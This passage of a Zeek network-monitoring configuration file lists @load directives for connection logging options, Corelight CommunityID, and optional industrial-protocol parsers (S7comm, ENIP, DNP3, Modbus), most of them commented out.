98 | # @load policy/protocols/conn/vlan-logging
99 |
100 | # Uncomment the following line to enable logging of link-layer addresses. Enabling
101 | # this adds the link-layer address for each connection endpoint to the conn.log file.
102 | # @load policy/protocols/conn/mac-logging
103 |
104 | # Uncomment this to source zkg's package state
105 | # @load packages
106 |
107 | # Comment this to unload Corelight/CommunityID
108 | @load Corelight/CommunityID
109 |
110 |
111 | #ICS Protocol
112 | #@load icsnpp/s7comm
113 |
114 | #@load icsnpp-enip
115 |
116 | #@load icsnpp-dnp3
117 |
118 | #@load icsnpp-modbus
--------------------------------------------------------------------------------